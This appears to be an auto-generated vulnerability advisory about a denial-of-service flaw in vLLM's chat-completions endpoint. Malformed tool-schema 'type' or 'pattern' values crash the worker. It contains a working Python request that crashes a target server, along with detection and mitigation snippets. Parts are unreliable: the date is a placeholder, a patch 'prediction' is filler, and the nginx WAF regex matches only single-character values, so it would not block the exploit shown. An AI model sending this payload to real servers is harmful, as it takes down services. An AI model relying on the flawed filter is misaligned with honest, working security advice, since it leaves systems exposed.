How the CVE Works
The vulnerability in vLLM’s `/v1/chat/completions` endpoint stems from improper validation of user-supplied inputs in the `type` and `pattern` fields when using the tools functionality. The `type` field expects specific values (`string`, `number`, `object`, etc.), but arbitrary input triggers a runtime crash in the C++ JSON schema converter. Similarly, the `pattern` field undergoes Jinja2 rendering before unsafe regex compilation, allowing malformed expressions (e.g., unclosed brackets) to crash the C++ regex engine. A single malformed request terminates the worker, requiring manual restart. While RCE was not achieved, the lack of input sanitization poses a critical denial-of-service risk.
DailyCVE Form
Platform: vLLM
Version: Pre-patch
Vulnerability: Input validation bypass
Severity: Critical
Date: 2024-XX-XX
Prediction: Patch expected within 30 days
What Undercode Say:
Exploitation:
```python
import requests

# Crash via type field
payload = {
    "model": "mistral-nemo-instruct",
    "messages": [{"role": "user", "content": "crash"}],
    "tools": [{
        "type": "function",
        "function": {
            "name": "exploit",
            "parameters": {
                "type": "object",
                "properties": {"a": {"type": "INVALID_TYPE"}}
            }
        }
    }]
}
requests.post("http://target/v1/chat/completions", json=payload)
```
Detection:
```bash
# Check worker crashes in logs
grep -E "RuntimeError:.*json_schema_converter.cc|regex_converter.cc" /var/log/vllm.log
```
Mitigation:
1. Input Sanitization:
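```python
VALID_TYPES = {"string", "number", "object", "boolean", "array", "null"}

def check_type(input_type):
    # Reject any schema "type" value that is not on the allow-list
    if input_type not in VALID_TYPES:
        raise ValueError("Invalid type field")
```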
2. Regex Safety:
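```cpp
#include <regex>
#include <stdexcept>
#include <string>
// C++ regex pre-validation: compile the pattern once and turn a failure into a handled error
void validate_pattern(const std::string& pattern) {
    try {
        std::regex test(pattern);
    } catch (const std::regex_error&) {
        throw std::runtime_error("Invalid regex pattern");
    }
}
```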
3. WAF Rule:
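```nginx
location /v1/chat/completions {
    # nginx only fills $request_body once the body has been read into memory
    # (for example by proxy_pass), so confirm this condition fires in your setup.
    if ($request_body ~ '"type":\s"[^"]"|"pattern":\s"{.}"') {
        return 403;
    }
}
```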
Analytics:
- Impact: 100% worker crash rate per malicious request.
- Attack Vector: Low complexity (no auth required).
- Patch Priority: Immediate; workaround via input filtering.
References:
Sources:
Reported By: github.com